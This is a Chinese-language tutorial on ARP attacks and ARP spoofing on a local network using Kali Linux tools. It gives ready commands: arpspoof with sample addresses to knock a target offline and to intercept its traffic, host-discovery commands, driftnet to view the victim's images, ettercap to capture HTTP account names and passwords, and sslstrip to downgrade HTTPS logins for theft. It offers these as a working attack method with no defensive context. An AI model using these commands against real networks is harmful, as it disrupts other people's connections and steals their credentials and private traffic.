0x01、ARP
ARP:地址解析协议,根据IP地址获取物理地址的一个TCP/IP协议。。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。
0x02、ARP攻击
目标IP流量经过我的网卡,通过伪造IP地址和MAC地址实现ARP欺骗,主要存在于局域网里,用户电脑在中了ARP攻击之后:计算机不能正常上网,出现网络中断的症状。
我们这里使用kali进行ARP攻击
arpspoof -i 网卡 -t 目标ip 网关
首先我们先查看kali的网卡以及ip
以及我们目标主机的ip
输入攻击命令,可以看见已经开始攻击了
arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
而我们目标主机则已经断网
就这样一条简单的命令就实现了局域网ARP攻击,那么我们如何获得目标主机ip呢
0x03、最简单的查看局域网ip
net view #查看全部局域网电脑名称
ping -4 电脑名称 #查看其对应的ip地址
arp -a #查看所有ip对应的物理地址
netstat -rm #查看局域网网关
是不是很简单啊
0x04、ARP欺骗
目标ip流量流经我的网卡,从网关出去。因为局域网的网络流通不是根据IP地址进行,而是根据MAC地址进行传输。ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
还是使用kali进行ARP欺骗
arpspoof -i 网卡 -t 网关 目标ip
我们开始进行欺骗
arpspoof -i eth0 -t 192.168.1.1 192.168.1.103
开一个新的终端,使用driftnet -i eth0,我们可以获得目标ip流经我们网卡的图片
使用kali linux 我们可以进行简单的ARP攻击以及欺骗
获取http账号和密码
我们还是在ARP欺骗的情况下进行,输入命令ettercap -Tq -i 网卡,(从网络流量中抓取账号密码,-T是以文本模式显示,q是以安静模式)
当我们一旦登陆它会立刻获取到了我们的账号和密码
获取https账号和密码
我们将https传输的账户和密码先转为http传输,在进行http获取
sslstrip -a -f -k #将https传输转为http
再接着还是设置网卡转发、arp欺骗、网络抓包。这里和上面的http的基本差不多